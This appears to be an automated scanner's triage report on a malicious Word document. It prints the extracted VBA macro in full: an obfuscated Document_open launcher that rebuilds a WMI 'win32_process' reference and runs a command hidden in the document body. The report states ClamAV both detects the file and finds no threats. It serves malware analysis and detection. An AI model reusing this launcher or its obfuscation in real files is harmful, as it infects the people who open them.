Verdict: MALICIOUS
Risk Score: 172

Heuristics (7)
- ClamAV: Doc.Malware.Valyria-10034158-0 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Malware.Valyria-10034158-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings)
  Document contains VBA macro code
- GetObject call (high, OLE_VBA_GETOBJ)
  Matched line in script: Set I__edah1cnhbwipsa = VBA.GetObject(Oxy0kbm7s8vu)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN)
  Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8432 bytes |

SHA-256: 1604f6e2e05bd78747d6f8ed2ec7d90b3ad25242821a34c9eac132c9f36477a5

Detection
ClamAV: No threats found
Obfuscation or payload: likely
81 of 151 identifiers look randomly generated (e.g. 'Mphv6i7r5jq4bblwie'); 1 string-concatenation chain(s) — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "Q7ihmehyptms2ng"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_open()
Bhp0aqfrkyw21
End Sub
Attribute VB_Name = "M4utal1sd5n14"
Attribute VB_Name = "Gkl7fm22d4p8qo1c_"
Function Bhp0aqfrkyw21()
GoTo ggngAD
Const yLCgDcc As String = "A"
Const reeuG As String = ","
Const zPTmF As String = "*high*,*critic*"
Dim TDrnH As Range: Set TDrnH = Array((yLCgDcc), Target)
If TDrnH Is Nothing Then
End If
Dim tqyOHM() As String: tqyOHM = Split(zPTmF, reeuG)
ggngAD:
skuwd = W0wvd14be68 + Q7ihmehyptms2ng _
. _
Content + Fzab301r4eg2
GoTo hHxBa
Const AcKvFGGG As String = "A"
Const itriFjHzL As String = ","
Const GqroGA As String = "*high*,*critic*"
Dim EwbbYE As Range: Set EwbbYE = Array((AcKvFGGG), Target)
If EwbbYE Is Nothing Then
End If
Dim ejjHwI() As String: ejjHwI = Split(GqroGA, itriFjHzL)
hHxBa:
mjbBYHhbs = "ns wu db " + "ndpns wu db nd"
R3qm3f52jnc5jc_kf = "ns wu db ndrons wu db ndns wu db ndc" + "ens wu db ndsns wu db ndsns wu db ndns wu db nd"
GoTo JsXSHPDHf
Const rnkAeDHKV As String = "A"
Const CzLpIAY As String = ","
Const otABk As String = "*high*,*critic*"
Dim KMoOZC As Range: Set KMoOZC = Array((rnkAeDHKV), Target)
If KMoOZC Is Nothing Then
End If
Dim RxAnNIODO() As String: RxAnNIODO = Split(otABk, CzLpIAY)
JsXSHPDHf:
U18pdqz11u1selluhb = "ns wu db nd:wns wu db ndns w" + "u db ndinns wu db nd3ns wu db nd2ns wu db nd_ns wu db nd"
GoTo rYbUHH
Const beEjBCIB As String = "A"
Const ZUaSM As String = ","
Const USpQJnFEE As String = "*high*,*critic*"
Dim JEqxI As Range: Set JEqxI = Array((beEjBCIB), Target)
If JEqxI Is Nothing Then
End If
Dim TdoGFcFC() As String: TdoGFcFC = Split(USpQJnFEE, ZUaSM)
rYbUHH:
Mphv6i7r5jq4bblwie = "wns wu db ndi" + "nns wu db ndmns wu db ndgmns wu db ndtns wu db ndns wu db nd"
GoTo LFCPgEIvS
Const zOtyHg As String = "A"
Const WunTAE As String = ","
Const PUivEGEF As String = "*high*,*critic*"
Dim wgArQBJLB As Range: Set wgArQBJLB = Array((zOtyHg), Target)
If wgArQBJLB Is Nothing Then
End If
Dim hxpGG() As String: hxpGG = Split(PUivEGEF, WunTAE)
LFCPgEIvS:
Owb53_mokkxn21tskl = "ns wu db ndns wu db nd" + Mid(Application.Name, 60 / 10, 1) + "ns wu db ndns wu db nd"
GoTo hQzUsiZ
Const gyEzHlHH As String = "A"
Const OOjdY As String = ","
Const wstyY As String = "*high*,*critic*"
Dim IMPEHFuW As Range: Set IMPEHFuW = Array((gyEzHlHH), Target)
If IMPEHFuW Is Nothing Then
End If
Dim RcFwUDqWD() As String: RcFwUDqWD = Split(wstyY, OOjdY)
hQzUsiZ:
Rg52lmivj3ydcurivj = Mphv6i7r5jq4bblwie + Owb53_mokkxn21tskl + U18pdqz11u1selluhb + mjbBYHhbs + R3qm3f52jnc5jc_kf
GoTo xIxrBGky
Const WpUaWIMo As String = "A"
Const CEEUXGpUi As String = ","
Const xUgQGBG As String = "*high*,*critic*"
Dim vZmBC As Range: Set vZmBC = Array((WpUaWIMo), Target)
If vZmBC Is Nothing Then
End If
Dim FjEjXGBH() As String: FjEjXGBH = Split(xUgQGBG, CEEUXGpUi)
xIxrBGky:
Oxy0kbm7s8vu = Kez1gv_r2ix6(Rg52lmivj3ydcurivj)
GoTo pmqlJnIaA
Const IrroIAjC As String = "A"
Const PUVbG As String = ","
Const dzTGHHqot As String = "*high*,*critic*"
Dim bmIBGb As Range: Set bmIBGb = Array((IrroIAjC), Target)
If bmIBGb Is Nothing Then
End If
Dim wdHTEGCLM() As String: wdHTEGCLM = Split(dzTGHHqot, PUVbG)
pmqlJnIaA:
Set I__edah1cnhbwipsa = VBA.GetObject(Oxy0kbm7s8vu)
GoTo brzGCN
Const dVnGYC As String = "A"
Const cuZpIJ As String = ","
Const NilSuVIgD As String = "*high*,*critic*"
Dim KMRoDHY As Range: Set KMRoDHY = Array((dVnGYC), Target)
If KMRoDHY Is Nothing Then
End If
Dim YXOfwAH() As String: YXOfwAH = Split(NilSuVIgD, cuZpIJ)
brzGCN:
mxkikw = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
pqwm = Kez1gv_r2ix6(mxkikw)
GoTo IJbKBIm
Const WZJsAtYE As String = "A"
Const XctmsIAUG As String = ","
Const DkEXbhP As String = "*high*,*critic*"
Dim lcAnp As Range: Set lcAnp = Array((WZJsAtYE), Target)
If lcAnp Is Nothing Then
End If
Dim frMyD() As String: frMyD = Split(DkEXbhP, XctmsIAUG)
IJbKBIm:
I__edah1cnhbwipsa.Create pqwm, K1ew1exp5knklujmz, Ejniyowb_7hqnwa82
GoTo LaNHCAEo
Const exceDEMA As String = "A"
Const ldjHJE As String = ","
Const IrcJGHm As String = "*high*,*critic*"
Dim WLFRBJI As Range: Set WLFRBJI = Array((exceDEMA), Target)
If WLFRBJI Is Nothing Then
End If
Dim vtrTREh() As String: vtrTREh = Split(IrcJGHm, ldjHJE)
LaNHCAEo:
End Function
Function Kez1gv_r2ix6(Ibo15ic8a8wo_se)
On Error Resume Next
GoTo bOvkG
Const aJVXECIJ As String = "A"
Const yJKQic As String = ","
Const ZtmGBgJD As String = "*high*,*critic*"
Dim AijQHLC As Range: Set AijQHLC = Array((aJVXECIJ), Target)
If AijQHLC Is Nothing Then
End If
Dim hWedHAAE() As String: hWedHAAE = Split(ZtmGBgJD, yJKQic)
bOvkG:
Cd7m4b5k04eoeddu5 = Ibo15ic8a8wo_se
GoTo bYNxG
Const tbNzLXX As String = "A"
Const WGveDbAIF As String = ","
Const EraFEW As String = "*high*,*critic*"
Dim FLzwI As Range: Set FLzwI = Array((tbNzLXX), Target)
If FLzwI Is Nothing Then
End If
Dim zoiajCSWD() As String: zoiajCSWD = Split(EraFEW, WGveDbAIF)
bYNxG:
Px0mn5fhczsxnllt = Agah81tjjqyo(Cd7m4b5k04eoeddu5)
GoTo FgLbW
Const pvhdmCCB As String = "A"
Const fZoiLEYz As String = ","
Const KpIfFyJ As String = "*high*,*critic*"
Dim PUGeDFCy As Range: Set PUGeDFCy = Array((pvhdmCCB), Target)
If PUGeDFCy Is Nothing Then
End If
Dim YZukJR() As String: YZukJR = Split(KpIfFyJ, fZoiLEYz)
FgLbW:
Kez1gv_r2ix6 = Px0mn5fhczsxnllt
GoTo iKfGA
Const sKSrjBC As String = "A"
Const EkiVXJ As String = ","
Const DnHAlGFJQ As String = "*high*,*critic*"
Dim bOnLHRB As Range: Set bOnLHRB = Array((sKSrjBC), Target)
If bOnLHRB Is Nothing Then
End If
Dim BdzZHC() As String: BdzZHC = Split(DnHAlGFJQ, EkiVXJ)
iKfGA:
End Function
Function Agah81tjjqyo(Gu79j7w403p16qz)
GoTo REeUEbHq
Const xaudGBl As String = "A"
Const iwunAkIB As String = ","
Const GGKbvJJI As String = "*high*,*critic*"
Dim GZvnH As Range: Set GZvnH = Array((xaudGBl), Target)
If GZvnH Is Nothing Then
End If
Dim IaHNsjlI() As String: IaHNsjlI = Split(GGKbvJJI, iwunAkIB)
REeUEbHq:
GoTo PMCGBy
Const PGooG As String = "A"
Const bYNpHSgkG As String = ","
Const mZhRCBE As String = "*high*,*critic*"
Dim zqJSGT As Range: Set zqJSGT = Array((PGooG), Target)
If zqJSGT Is Nothing Then
End If
Dim KFchF() As String: KFchF = Split(mZhRCBE, bYNpHSgkG)
PMCGBy:
GoTo vPfUDmBA
Const ypMqJ As String = "A"
Const eqBNQIHC As String = ","
Const xATDEDCo As String = "*high*,*critic*"
Dim hFPYGcG As Range: Set hFPYGcG = Array((ypMqJ), Target)
If hFPYGcG Is Nothing Then
End If
Dim FTqWXFQ() As String: FTqWXFQ = Split(xATDEDCo, eqBNQIHC)
vPfUDmBA:
Agah81tjjqyo = Replace(Gu79j7w403p16qz, "ns w" + "u db nd", Nhylfrtr9zy0)
GoTo CjvOCJq
Const KbvQFR As String = "A"
Const GTYfmGBb As String = ","
Const JOmdaG As String = "*high*,*critic*"
Dim sMJmXA As Range: Set sMJmXA = Array((KbvQFR), Target)
If sMJmXA Is Nothing Then
End If
Dim nDcQBkMD() As String: nDcQBkMD = Split(JOmdaG, GTYfmGBb)
CjvOCJq:
GoTo PFFIDVjq
Const hvDTWiR As String = "A"
Const gqbeGNF As String = ","
Const jTblmIr As String = "*high*,*critic*"
Dim rezOFgH As Range: Set rezOFgH = Array((hvDTWiR), Target)
If rezOFgH Is Nothing Then
End If
Dim qxxGEz() As String: qxxGEz = Split(jTblmIr, gqbeGNF)
PFFIDVjq:
GoTo GcAUmNwDY
Const XNBzCL As String = "A"
Const pVVsBCF As String = ","
Const JPzVCPa As String = "*high*,*critic*"
Dim DNFZJ As Range: Set DNFZJ = Array((XNBzCL), Target)
If DNFZJ Is Nothing Then
End If
Dim awfAvBE() As String: awfAvBE = Split(JPzVCPa, pVVsBCF)
GcAUmNwDY:
End Function